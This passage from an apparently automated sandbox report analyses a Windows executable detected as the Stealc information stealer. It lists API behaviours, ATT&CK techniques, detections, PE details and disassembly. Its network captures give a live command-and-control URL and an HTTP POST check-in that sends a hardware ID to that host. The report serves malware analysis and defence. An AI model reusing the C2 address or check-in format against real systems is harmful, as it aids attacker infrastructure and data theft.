                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00749600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,0_2_00749600
                Source: file.exe, file.exe, 00000000.00000002.2170153838.0000000000B15000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Program Manager
                Source: C:\Users\user\Desktop\file.exeCode function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,0_2_00747B90
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00746920 GetSystemTime,sscanf,SystemTimeToFileTime,SystemTimeToFileTime,ExitProcess,0_2_00746920
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00747850 GetProcessHeap,RtlAllocateHeap,GetUserNameA,0_2_00747850
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00747A30 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA,0_2_00747A30

                Stealing of Sensitive Information

                barindex
                Yara detected Stealc
                Source: Yara matchFile source: 0.2.file.exe.730000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.2170845587.00000000013CE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.2036482176.00000000050F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2169991722.0000000000731000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 5588, type: MEMORYSTR
                Source: Yara matchFile source: dump.pcap, type: PCAP

                Remote Access Functionality

                barindex
                Yara detected Stealc
                Source: Yara matchFile source: 0.2.file.exe.730000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.2170845587.00000000013CE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.2036482176.00000000050F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2169991722.0000000000731000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 5588, type: MEMORYSTR
                Source: Yara matchFile source: dump.pcap, type: PCAP

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
                Command and Scripting Interpreter                		1
                DLL Side-Loading                		11
                Process Injection                		1
                Masquerading                		OS Credential Dumping2
                System Time Discovery                		Remote Services1
                Archive Collected Data                		2
                Encrypted Channel                		Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault Accounts11
                Native API                		Boot or Logon Initialization Scripts1
                DLL Side-Loading                		33
                Virtualization/Sandbox Evasion                		LSASS Memory641
                Security Software Discovery                		Remote Desktop ProtocolData from Removable Media2
                Ingress Tool Transfer                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
                Disable or Modify Tools                		Security Account Manager33
                Virtualization/Sandbox Evasion                		SMB/Windows Admin SharesData from Network Shared Drive2
                Non-Application Layer Protocol                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
                Process Injection                		NTDS13
                Process Discovery                		Distributed Component Object ModelInput Capture12
                Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                Deobfuscate/Decode Files or Information                		LSA Secrets1
                Account Discovery                		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts3
                Obfuscated Files or Information                		Cached Domain Credentials1
                System Owner/User Discovery                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items12
                Software Packing                		DCSync1
                File and Directory Discovery                		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                DLL Side-Loading                		Proc Filesystem324
                System Information Discovery                		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                file.exe100%AviraTR/Crypt.TPM.Gen
                file.exe100%Joe Sandbox ML

                Dropped Files

                No Antivirus matches

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                http://185.215.113.37/100%URL Reputationmalware
                http://185.215.113.37100%URL Reputationmalware
                http://185.215.113.37/e2b1563c6670f193.php100%URL Reputationmalware
                http://185.215.113.37/ws100%URL Reputationmalware

                Domains and IPs

                Contacted Domains

                No contacted domains info

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                http://185.215.113.37/true
                • URL Reputation: malware
                		unknown
                http://185.215.113.37/e2b1563c6670f193.phptrue
                • URL Reputation: malware
                		unknown

                URLs from Memory and Binaries

                NameSourceMaliciousAntivirus DetectionReputation
                http://185.215.113.37/e2b1563c6670f193.phphS)file.exe, 00000000.00000002.2170845587.0000000001440000.00000004.00000020.00020000.00000000.sdmptrue
                  		unknown
                  http://185.215.113.37file.exe, 00000000.00000002.2170845587.00000000013CE000.00000004.00000020.00020000.00000000.sdmptrue
                  • URL Reputation: malware
                  		unknown
                  http://185.215.113.37/wsfile.exe, 00000000.00000002.2170845587.0000000001426000.00000004.00000020.00020000.00000000.sdmptrue
                  • URL Reputation: malware
                  		unknown
                  http://185.215.113.37/e2b1563c6670f193.phpifile.exe, 00000000.00000002.2170845587.0000000001426000.00000004.00000020.00020000.00000000.sdmptrue
                    		unknown

                    World Map of Contacted IPs

                    • No. of IPs < 25%
                    • 25% < No. of IPs < 50%
                    • 50% < No. of IPs < 75%
                    • 75% < No. of IPs

                    Public IPs

                    IPDomainCountryFlagASNASN NameMalicious
                    185.215.113.37
                    		unknownPortugal
                    		206894WHOLESALECONNECTIONSNLtrue

                    General Information

                    Joe Sandbox version:41.0.0 Charoite
                    Analysis ID:1532981
                    Start date and time:2024-10-14 08:57:05 +02:00
                    Joe Sandbox product:CloudBasic
                    Overall analysis duration:0h 4m 58s
                    Hypervisor based Inspection enabled:false
                    Report type:full
                    Cookbook file name:default.jbs
                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                    Number of analysed new started processes analysed:5
                    Number of new started drivers analysed:0
                    Number of existing processes analysed:0
                    Number of existing drivers analysed:0
                    Number of injected processes analysed:0
                    Technologies:
                    • HCA enabled
                    • EGA enabled
                    • AMSI enabled
                    Analysis Mode:default
                    Analysis stop reason:Timeout
                    Sample name:file.exe
                    Detection:MAL
                    Classification:mal100.troj.evad.winEXE@1/0@0/1
                    EGA Information:
                    • Successful, ratio: 100%
                    HCA Information:
                    • Successful, ratio: 79%
                    • Number of executed functions: 18
                    • Number of non-executed functions: 85
                    Cookbook Comments:
                    • Found application associated with file extension: .exe

                    Warnings

                    • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                    • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                    • Report size getting too big, too many NtQueryValueKey calls found.
                    • VT rate limit hit for: file.exe

                    Simulations

                    Behavior and APIs

                    No simulations

                    Joe Sandbox View / Context

                    IPs

                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                    185.215.113.37file.exeGet hashmaliciousStealc, VidarBrowse
                    • 185.215.113.37/e2b1563c6670f193.php
                    file.exeGet hashmaliciousStealcBrowse
                    • 185.215.113.37/e2b1563c6670f193.php
                    file.exeGet hashmaliciousStealcBrowse
                    • 185.215.113.37/e2b1563c6670f193.php
                    file.exeGet hashmaliciousStealc, VidarBrowse
                    • 185.215.113.37/e2b1563c6670f193.php
                    file.exeGet hashmaliciousStealcBrowse
                    • 185.215.113.37/e2b1563c6670f193.php
                    file.exeGet hashmaliciousStealcBrowse
                    • 185.215.113.37/e2b1563c6670f193.php
                    file.exeGet hashmaliciousStealc, VidarBrowse
                    • 185.215.113.37/e2b1563c6670f193.php
                    file.exeGet hashmaliciousStealcBrowse
                    • 185.215.113.37/e2b1563c6670f193.php
                    file.exeGet hashmaliciousStealcBrowse
                    • 185.215.113.37/e2b1563c6670f193.php
                    file.exeGet hashmaliciousStealc, VidarBrowse
                    • 185.215.113.37/e2b1563c6670f193.php

                    Domains

                    No context

                    ASNs

                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                    WHOLESALECONNECTIONSNLfile.exeGet hashmaliciousStealc, VidarBrowse
                    • 185.215.113.37
                    file.exeGet hashmaliciousStealcBrowse
                    • 185.215.113.37
                    file.exeGet hashmaliciousStealcBrowse
                    • 185.215.113.37
                    file.exeGet hashmaliciousStealc, VidarBrowse
                    • 185.215.113.37
                    file.exeGet hashmaliciousStealcBrowse
                    • 185.215.113.37
                    file.exeGet hashmaliciousStealcBrowse
                    • 185.215.113.37
                    file.exeGet hashmaliciousStealc, VidarBrowse
                    • 185.215.113.37
                    file.exeGet hashmaliciousStealcBrowse
                    • 185.215.113.37
                    file.exeGet hashmaliciousStealcBrowse
                    • 185.215.113.37
                    file.exeGet hashmaliciousStealc, VidarBrowse
                    • 185.215.113.37

                    JA3 Fingerprints

                    No context

                    Dropped Files

                    No context

                    Created / dropped Files

                    No created / dropped files found

                    Static File Info

                    General

                    File type:PE32 executable (GUI) Intel 80386, for MS Windows
                    Entropy (8bit):7.945341996240295
                    TrID:
                    • Win32 Executable (generic) a (10002005/4) 99.96%
                    • Generic Win/DOS Executable (2004/3) 0.02%
                    • DOS Executable Generic (2002/1) 0.02%
                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                    File name:file.exe
                    File size:1'856'512 bytes
                    MD5:9fa6a87d6ac6c29173f38b8de4ea7272
                    SHA1:c333a6778cc153fdbbadccc1cda4f575103c818c
                    SHA256:56b3a862526d4a5ae4311c3b742a7a42cd6206939944458e3566694b1cddf0ba
                    SHA512:913efb4c7ece09f91af9fc7f0309b95136144706636880993720ebde7fc0a28fc09b26ba72c2c26513fe238fad72a7d49c46e37ec2c6a83055968ae900fb021c
                    SSDEEP:49152:R3frr12zC+DmeyrY2D7m8kVpvDSJW9UqAFsv:xp2Bmr9Di8kVpDcW9Uqjv
                    TLSH:1385333B1FB7B7CCC5CE8930556E116BD84AEA2AC4161DFAB98183F0D772829670CD91
                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........C..............X.......m.......Y.......p.....y.........`...............\.......n.....Rich............PE..L...J..f...........

                    File Icon

                    Icon Hash:00928e8e8686b000

                    Static PE Info

                    General

                    Entrypoint:0xa9b000
                    Entrypoint Section:.taggant
                    Digitally signed:false
                    Imagebase:0x400000
                    Subsystem:windows gui
                    Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                    DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                    Time Stamp:0x66F99A4A [Sun Sep 29 18:19:54 2024 UTC]
                    TLS Callbacks:
                    CLR (.Net) Version:
                    OS Version Major:5
                    OS Version Minor:1
                    File Version Major:5
                    File Version Minor:1
                    Subsystem Version Major:5
                    Subsystem Version Minor:1
                    Import Hash:2eabe9054cad5152567f0699947a2c5b

                    Entrypoint Preview

                    Instruction
                    jmp 00007FF154E7FF7Ah
                    rdmsr
                    sbb al, 00h
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    jmp 00007FF154E81F75h
                    add byte ptr [ecx], ah
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [esi], al
                    or al, byte ptr [eax]
                    add byte ptr [ecx], al
                    or al, byte ptr [eax]
                    add byte ptr [ebx], cl
                    or al, byte ptr [eax]
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [ecx], al
                    add byte ptr [eax], 00000000h
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    and byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    or ecx, dword ptr [edx]
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    adc byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add dword ptr [edx], ecx
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al

                    Rich Headers

                    Programming Language:
                    • [C++] VS2010 build 30319
                    • [ASM] VS2010 build 30319
                    • [ C ] VS2010 build 30319
                    • [ C ] VS2008 SP1 build 30729
                    • [IMP] VS2008 SP1 build 30729
                    • [LNK] VS2010 build 30319

                    Data Directories

                    NameVirtual AddressVirtual Size Is in Section
                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                    IMAGE_DIRECTORY_ENTRY_IMPORT0x25d0500x64.idata
                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x25d1f80x8.idata
                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                    IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                    Sections

                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                    0x10000x25b0000x22800cc54a1d82142359d175c5e3d32842250unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                    .rsrc 0x25c0000x10000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                    .idata 0x25d0000x10000x200c60c4959cc8d384ac402730cc6842bb0False0.1328125data0.9064079259880791IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                    0x25e0000x29d0000x200873deeb3f5d3e810fc813775a0b75a71unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                    lyglkzel0x4fb0000x19f0000x19f0000382e73feca9d9c9316df90d61e63baeFalse0.9946942065135542data7.95357659859666IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                    njsekajy0x69a0000x10000x60067ac0235ad982360af0a1fa4f138f78cFalse0.5240885416666666data4.741618845278596IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                    .taggant0x69b0000x30000x22003ef9c6bfb8ee64973671e69728a35962False0.058363970588235295DOS executable (COM)0.6349130055277218IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                    Imports

                    DLLImport
                    kernel32.dlllstrcpy

                    Network Behavior

                    Suricata IDS Alerts

                    TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                    2024-10-14T08:58:08.073470+02002044243ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in1192.168.2.549704185.215.113.3780TCP

                    Network Port Distribution

                    TCP Packets

                    TimestampSource PortDest PortSource IPDest IP
                    Oct 14, 2024 08:57:56.786123037 CEST4970480192.168.2.5185.215.113.37
                    Oct 14, 2024 08:57:56.791255951 CEST8049704185.215.113.37192.168.2.5
                    Oct 14, 2024 08:57:56.791357994 CEST4970480192.168.2.5185.215.113.37
                    Oct 14, 2024 08:57:56.791490078 CEST4970480192.168.2.5185.215.113.37
                    Oct 14, 2024 08:57:56.796588898 CEST8049704185.215.113.37192.168.2.5
                    Oct 14, 2024 08:58:07.818948984 CEST8049704185.215.113.37192.168.2.5
                    Oct 14, 2024 08:58:07.819070101 CEST4970480192.168.2.5185.215.113.37
                    Oct 14, 2024 08:58:07.833405018 CEST4970480192.168.2.5185.215.113.37
                    Oct 14, 2024 08:58:07.838265896 CEST8049704185.215.113.37192.168.2.5
                    Oct 14, 2024 08:58:08.073322058 CEST8049704185.215.113.37192.168.2.5
                    Oct 14, 2024 08:58:08.073470116 CEST4970480192.168.2.5185.215.113.37
                    Oct 14, 2024 08:58:11.496536016 CEST4970480192.168.2.5185.215.113.37

                    HTTP Request Dependency Graph

                    • 185.215.113.37

                    HTTP Packets

                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    0192.168.2.549704185.215.113.37805588C:\Users\user\Desktop\file.exe
                    TimestampBytes transferredDirectionData
                    Oct 14, 2024 08:57:56.791490078 CEST89OUTGET / HTTP/1.1
                    Host: 185.215.113.37
                    Connection: Keep-Alive
                    Cache-Control: no-cache
                    Oct 14, 2024 08:58:07.818948984 CEST203INHTTP/1.1 200 OK
                    Date: Mon, 14 Oct 2024 06:58:07 GMT
                    Server: Apache/2.4.52 (Ubuntu)
                    Content-Length: 0
                    Keep-Alive: timeout=5, max=100
                    Connection: Keep-Alive
                    Content-Type: text/html; charset=UTF-8
                    Oct 14, 2024 08:58:07.833405018 CEST412OUTPOST /e2b1563c6670f193.php HTTP/1.1
                    Content-Type: multipart/form-data; boundary=----JKKFIIEBKEGIEBFIJKFI
                    Host: 185.215.113.37
                    Content-Length: 211
                    Connection: Keep-Alive
                    Cache-Control: no-cache
                    Data Raw: 2d 2d 2d 2d 2d 2d 4a 4b 4b 46 49 49 45 42 4b 45 47 49 45 42 46 49 4a 4b 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 32 43 33 44 46 45 45 30 31 45 34 46 34 30 33 33 30 36 30 30 37 31 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 4b 46 49 49 45 42 4b 45 47 49 45 42 46 49 4a 4b 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 4b 46 49 49 45 42 4b 45 47 49 45 42 46 49 4a 4b 46 49 2d 2d 0d 0a
                    Data Ascii: ------JKKFIIEBKEGIEBFIJKFIContent-Disposition: form-data; name="hwid"2C3DFEE01E4F4033060071------JKKFIIEBKEGIEBFIJKFIContent-Disposition: form-data; name="build"doma------JKKFIIEBKEGIEBFIJKFI--
                    Oct 14, 2024 08:58:08.073322058 CEST210INHTTP/1.1 200 OK
                    Date: Mon, 14 Oct 2024 06:58:07 GMT
                    Server: Apache/2.4.52 (Ubuntu)
                    Content-Length: 8
                    Keep-Alive: timeout=5, max=99
                    Connection: Keep-Alive
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 59 6d 78 76 59 32 73 3d
                    Data Ascii: YmxvY2s=


                    Statistics

                    CPU Usage

                    Click to jump to process

                    Memory Usage

                    Click to jump to process

                    High Level Behavior Distribution

                    Click to dive into process behavior distribution

                    System Behavior

                    General

                    Target ID:0
                    Start time:02:57:54
                    Start date:14/10/2024
                    Path:C:\Users\user\Desktop\file.exe
                    Wow64 process (32bit):true
                    Commandline:"C:\Users\user\Desktop\file.exe"
                    Imagebase:0x730000
                    File size:1'856'512 bytes
                    MD5 hash:9FA6A87D6AC6C29173F38B8DE4EA7272
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Yara matches:
                    • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2170845587.00000000013CE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000003.2036482176.00000000050F0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2169991722.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                    Reputation:low
                    Has exited:true

                    Disassembly

                    Reset < >

                      Execution Graph

                      Execution Coverage:7.5%
                      Dynamic/Decrypted Code Coverage:0%
                      Signature Coverage:2.9%
                      Total number of Nodes:2000
                      Total number of Limit Nodes:25
                      execution_graph 13262 7469f0 13307 732260 13262->13307 13286 746a64 13287 74a9b0 4 API calls 13286->13287 13288 746a6b 13287->13288 13289 74a9b0 4 API calls 13288->13289 13290 746a72 13289->13290 13291 74a9b0 4 API calls 13290->13291 13292 746a79 13291->13292 13293 74a9b0 4 API calls 13292->13293 13294 746a80 13293->13294 13459 74a8a0 13294->13459 13296 746b0c 13463 746920 GetSystemTime 13296->13463 13297 746a89 13297->13296 13299 746ac2 OpenEventA 13297->13299 13301 746af5 CloseHandle Sleep 13299->13301 13302 746ad9 13299->13302 13304 746b0a 13301->13304 13306 746ae1 CreateEventA 13302->13306 13304->13297 13306->13296 13660 7345c0 13307->13660 13309 732274 13310 7345c0 2 API calls 13309->13310 13311 73228d 13310->13311 13312 7345c0 2 API calls 13311->13312 13313 7322a6 13312->13313 13314 7345c0 2 API calls 13313->13314 13315 7322bf 13314->13315 13316 7345c0 2 API calls 13315->13316 13317 7322d8 13316->13317 13318 7345c0 2 API calls 13317->13318 13319 7322f1 13318->13319 13320 7345c0 2 API calls 13319->13320 13321 73230a 13320->13321 13322 7345c0 2 API calls 13321->13322 13323 732323 13322->13323 13324 7345c0 2 API calls 13323->13324 13325 73233c 13324->13325 13326 7345c0 2 API calls 13325->13326 13327 732355 13326->13327 13328 7345c0 2 API calls 13327->13328 13329 73236e 13328->13329 13330 7345c0 2 API calls 13329->13330 13331 732387 13330->13331 13332 7345c0 2 API calls 13331->13332 13333 7323a0 13332->13333 13334 7345c0 2 API calls 13333->13334 13335 7323b9 13334->13335 13336 7345c0 2 API calls 13335->13336 13337 7323d2 13336->13337 13338 7345c0 2 API calls 13337->13338 13339 7323eb 13338->13339 13340 7345c0 2 API calls 13339->13340 13341 732404 13340->13341 13342 7345c0 2 API calls 13341->13342 13343 73241d 13342->13343 13344 7345c0 2 API calls 13343->13344 13345 732436 13344->13345 13346 7345c0 2 API calls 13345->13346 13347 73244f 13346->13347 13348 7345c0 2 API calls 13347->13348 13349 732468 13348->13349 13350 7345c0 2 API calls 13349->13350 13351 732481 13350->13351 13352 7345c0 2 API calls 13351->13352 13353 73249a 13352->13353 13354 7345c0 2 API calls 13353->13354 13355 7324b3 13354->13355 13356 7345c0 2 API calls 13355->13356 13357 7324cc 13356->13357 13358 7345c0 2 API calls 13357->13358 13359 7324e5 13358->13359 13360 7345c0 2 API calls 13359->13360 13361 7324fe 13360->13361 13362 7345c0 2 API calls 13361->13362 13363 732517 13362->13363 13364 7345c0 2 API calls 13363->13364 13365 732530 13364->13365 13366 7345c0 2 API calls 13365->13366 13367 732549 13366->13367 13368 7345c0 2 API calls 13367->13368 13369 732562 13368->13369 13370 7345c0 2 API calls 13369->13370 13371 73257b 13370->13371 13372 7345c0 2 API calls 13371->13372 13373 732594 13372->13373 13374 7345c0 2 API calls 13373->13374 13375 7325ad 13374->13375 13376 7345c0 2 API calls 13375->13376 13377 7325c6 13376->13377 13378 7345c0 2 API calls 13377->13378 13379 7325df 13378->13379 13380 7345c0 2 API calls 13379->13380 13381 7325f8 13380->13381 13382 7345c0 2 API calls 13381->13382 13383 732611 13382->13383 13384 7345c0 2 API calls 13383->13384 13385 73262a 13384->13385 13386 7345c0 2 API calls 13385->13386 13387 732643 13386->13387 13388 7345c0 2 API calls 13387->13388 13389 73265c 13388->13389 13390 7345c0 2 API calls 13389->13390 13391 732675 13390->13391 13392 7345c0 2 API calls 13391->13392 13393 73268e 13392->13393 13394 749860 13393->13394 13665 749750 GetPEB 13394->13665 13396 749868 13397 749a93 LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA 13396->13397 13398 74987a 13396->13398 13399 749af4 GetProcAddress 13397->13399 13400 749b0d 13397->13400 13401 74988c 21 API calls 13398->13401 13399->13400 13402 749b46 13400->13402 13403 749b16 GetProcAddress GetProcAddress 13400->13403 13401->13397 13404 749b4f GetProcAddress 13402->13404 13405 749b68 13402->13405 13403->13402 13404->13405 13406 749b71 GetProcAddress 13405->13406 13407 749b89 13405->13407 13406->13407 13408 746a00 13407->13408 13409 749b92 GetProcAddress GetProcAddress 13407->13409 13410 74a740 13408->13410 13409->13408 13411 74a750 13410->13411 13412 746a0d 13411->13412 13413 74a77e lstrcpy 13411->13413 13414 7311d0 13412->13414 13413->13412 13415 7311e8 13414->13415 13416 731217 13415->13416 13417 73120f ExitProcess 13415->13417 13418 731160 GetSystemInfo 13416->13418 13419 731184 13418->13419 13420 73117c ExitProcess 13418->13420 13421 731110 GetCurrentProcess VirtualAllocExNuma 13419->13421 13422 731141 ExitProcess 13421->13422 13423 731149 13421->13423 13666 7310a0 VirtualAlloc 13423->13666 13426 731220 13670 7489b0 13426->13670 13429 731249 __aulldiv 13430 73129a 13429->13430 13431 731292 ExitProcess 13429->13431 13432 746770 GetUserDefaultLangID 13430->13432 13433 746792 13432->13433 13434 7467d3 13432->13434 13433->13434 13435 7467b7 ExitProcess 13433->13435 13436 7467c1 ExitProcess 13433->13436 13437 7467a3 ExitProcess 13433->13437 13438 7467ad ExitProcess 13433->13438 13439 7467cb ExitProcess 13433->13439 13440 731190 13434->13440 13441 7478e0 3 API calls 13440->13441 13442 73119e 13441->13442 13443 7311cc 13442->13443 13444 747850 3 API calls 13442->13444 13447 747850 GetProcessHeap RtlAllocateHeap GetUserNameA 13443->13447 13445 7311b7 13444->13445 13445->13443 13446 7311c4 ExitProcess 13445->13446 13448 746a30 13447->13448 13449 7478e0 GetProcessHeap RtlAllocateHeap GetComputerNameA 13448->13449 13450 746a43 13449->13450 13451 74a9b0 13450->13451 13672 74a710 